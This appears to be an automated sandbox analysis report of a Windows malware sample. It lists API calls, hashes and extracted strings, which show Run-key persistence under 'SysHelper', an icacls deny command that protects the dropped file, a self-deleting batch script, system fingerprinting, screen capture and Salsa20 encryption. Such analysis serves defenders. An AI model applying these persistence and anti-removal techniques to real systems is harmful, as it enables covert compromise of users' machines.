                                                                                                    • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                  • _free.LIBCMT ref: 0040E6C5
                                                                                                  • _malloc.LIBCMT ref: 0040E6CD
                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                  • _sprintf.LIBCMT ref: 0040E720
                                                                                                  • _wprintf.LIBCMT ref: 0040E732
                                                                                                  • _wprintf.LIBCMT ref: 0040E73C
                                                                                                  • _free.LIBCMT ref: 0040E745
                                                                                                  Strings
                                                                                                  • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                  • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                  • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocErrorFreeLast_sprintf
                                                                                                  • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                  • API String ID: 473631332-1604013687
                                                                                                  • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                  • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3232302685-0
                                                                                                  • Opcode ID: 2936c85e8f885e92035f2aef14cfadfed421b87f0d385f1becd02d4e5c78b91b
                                                                                                  • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                                                                                  • Opcode Fuzzy Hash: 2936c85e8f885e92035f2aef14cfadfed421b87f0d385f1becd02d4e5c78b91b
                                                                                                  • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                  • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                  • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                  • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                  • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wassert
                                                                                                  • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                  • API String ID: 3993402318-1975116136
                                                                                                  • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                  • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                  • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                  • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                  • _memset.LIBCMT ref: 00411D3B
                                                                                                  • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                  • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                                                                                  • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                                  • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                                  • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                                  • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                                  • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                                  • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                                  • _memset.LIBCMT ref: 00412090
                                                                                                  • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                                  • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                                  • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                                  • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                                  • _memset.LIBCMT ref: 00412120
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                                  • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                  • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                  • API String ID: 2589766509-1182136429
                                                                                                  • Opcode ID: 2830f4d22bb4cc6c66c95b42a458652ef167f5d2173bbe45734798a70efe51a0
                                                                                                  • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                                  • Opcode Fuzzy Hash: 2830f4d22bb4cc6c66c95b42a458652ef167f5d2173bbe45734798a70efe51a0
                                                                                                  • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                  • GetLastError.KERNEL32 ref: 00412509
                                                                                                  • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                  • CloseHandle.KERNEL32 ref: 00412539
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                  • GetLastError.KERNEL32 ref: 0041255B
                                                                                                  • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                  • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                  • API String ID: 2372642624-488272950
                                                                                                  • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                  • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                  • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                  • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32 ref: 00411915
                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                  • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                  • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                  • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                  • _memset.LIBCMT ref: 004119B8
                                                                                                  • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                    • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                  • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                  • String ID: failed with error
                                                                                                  • API String ID: 4182478520-946485432
                                                                                                  • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                  • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                  • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                  • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                    • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                    • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                    • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                    • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                    • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                    • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                    • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                  • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                  • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                  • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                  • DeleteDC.GDI32(?), ref: 00482450
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                  • API String ID: 151064509-1805842116
                                                                                                  • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                  • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                  • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                  • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                  • API String ID: 909875538-2733969777
                                                                                                  • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                  • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                  • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                  • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503006713-0
                                                                                                  • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                  • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                  • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                  • _malloc.LIBCMT ref: 0041BBE4
                                                                                                  • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                  • _free.LIBCMT ref: 0041BCD7
                                                                                                    • Part of subcall function 00411CD0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                    • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                    • Part of subcall function 00411CD0: RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                    • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                    • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                    • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                  • IsWindow.USER32(?), ref: 0041BF69
                                                                                                  • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                  • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3873257347-0
                                                                                                  • Opcode ID: 95ce8d5bcbae79598e79a345e2570bf3c9b71037e1cd50604d613cd91e3bc71a
                                                                                                  • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                  • Opcode Fuzzy Hash: 95ce8d5bcbae79598e79a345e2570bf3c9b71037e1cd50604d613cd91e3bc71a
                                                                                                  • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • DecodePointer.KERNEL32 ref: 00427B29
                                                                                                  • _free.LIBCMT ref: 00427B42
                                                                                                    • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  • _free.LIBCMT ref: 00427B55
                                                                                                  • _free.LIBCMT ref: 00427B73
                                                                                                  • _free.LIBCMT ref: 00427B85
                                                                                                  • _free.LIBCMT ref: 00427B96
                                                                                                  • _free.LIBCMT ref: 00427BA1
                                                                                                  • _free.LIBCMT ref: 00427BC5
                                                                                                  • EncodePointer.KERNEL32(006D85B0), ref: 00427BCC
                                                                                                  • _free.LIBCMT ref: 00427BE1
                                                                                                  • _free.LIBCMT ref: 00427BF7
                                                                                                  • _free.LIBCMT ref: 00427C1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3064303923-0
                                                                                                  • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                  • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                                                                                                  • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                  • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                  • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                  • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                  • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                  • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                  • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                  • String ID: \shell32.dll
                                                                                                  • API String ID: 679253221-3783449302
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                  • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                  • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                  • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                  • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
